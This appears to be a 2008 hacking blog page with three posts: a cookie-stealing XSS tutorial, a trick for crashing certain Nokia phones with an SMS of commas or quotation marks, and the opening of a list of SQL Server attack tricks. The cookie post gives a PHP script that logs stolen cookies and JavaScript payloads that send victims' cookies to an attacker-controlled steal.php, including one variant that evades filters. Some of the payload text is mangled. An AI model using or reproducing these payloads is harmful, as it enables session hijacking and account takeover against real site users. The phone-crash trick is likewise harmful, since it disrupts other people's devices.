High Quality
Open the downloaded document, and select print from the file menu (PDF reader required).
Posted in Snarfingwith tags cookie snarf , how to steal cookieson August 12, 2008 by hacktocrack
Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:Code: jalert(document.cookie)After you press enter, you should see a pop-up window with some information in it(that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s anexample of what might be in your cookie:Code:username=CyberPhreak;password=ilikepieThis is, of course, a very insecure cookie. If any sort of vulnerability was found thatallowed for someone to view other people’s cookies, every user account is possiblycompromised. You’ll be hard-pressed to find a site with cookies like these. However, itis very common (unfortunately) to find sites with hashes of passwords within the cookie.The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough. Now you know why cookies are important; they usually have important informationabout the user in them. But how would we go about getting or changing other users’cookies? This Is the process of cookiestealing.Cookiestealing is a two-part process. You need to have a script to accept the cookie, andyou need to have a way of sending the cookie to your script. Writing the script to acceptthe cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies:Code:<?php$cookie=$_GET['cookie'];$log=fopen(”log.txt”,“a”);fwrite($log,$cookie.”\n”);fclose($log);?>
And there you have it, a simple cookiestealer. The way this script works is that it acceptsthe cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and thensaves it to a file called ‘log.txt’. For example:Code:http://yoursite.com/steal.php?cookie=steal.phpis the filename of the script we just wrote, ? lets the script know that we aregoing to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. Thisis the second and harder part of the cookiestealer.Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your owncode into a website. This might sound difficult, and in most cases it’s not easy, butit can be very simple.Any website that allows you to post text potentially allows you to insert your own codeinto the website. Some examples of these types of sites are forums, guestbooks, any sitewith a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable tocookiestealing.Let’s assume that we have a website that someone made. This website has user logincapability as well as a guestbook. And let’s also assume that this website doesn’t haveany kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you anexample of some code that we could put into a guestbook post that would send the user’scookie to out script:Code:<script>document.location=‘http://yoursite.com/steal.php?cookie=’+document.cookie;</script> Now whenever someone views the page that you posted this on, they will be redirected toyour script with their cookie from this site in the URL. If you were to look at log.txtnow, you’d see the cookies of whoever looked at that page.But cookiestealing is never that easy. Let’s assume now that the administrator of thissite got smart, and decided to filter out script tags. Now you code doesn’t work, sowe have to try and evade the filter. In this instance, it’s easy enough:Code:<ahref=”jvoid(document.location=’http://yoursite.com/steal.php?cookie=’+document.cookie)”>Click Me</a>
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to getaround filters.
Posted in hacking,offline hackingwith tags hack phone with sms, how to restart phone, how to restart
phone using sms,restart phone on August 4, 2008 by hacktocrack
Here is a new trick to restart ur friends mobile via smswith this trick only 1110,1110i,1112,1100,2100 can be restarted. just type,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,or 79 inverted commasin text msg and send it to ur friend having cells mention above and see wat happens.
Posted in Hardcore Hacking,Website hacks, hackingwith tags hack sql, sql,sql hack ,sql hacking,sql
injection,sql server systemon August 4, 2008 by hacktocrack
Whether it is through manual poking and prodding or the use of security testing tools,malicious attackers employ a variety of tricks to break into SQL Server systems, bothinside and outside your firewall. It stands to reason then, if the hackers are doing it, youneed to carry the same attacks to test the security strength of your systems. Here are 10hacker tricks to gain access and violate systems running SQL Server.1. Direct connections via the InternetThese connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just howmany systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I stillfind this flaw in my assessments, and we all remember the effect the SQL Slammer wormhad on so many vulnerable SQL Server systems. Nevertheless, these direct attacks canlead to denial of service, buffer overflows and more.
Add a Comment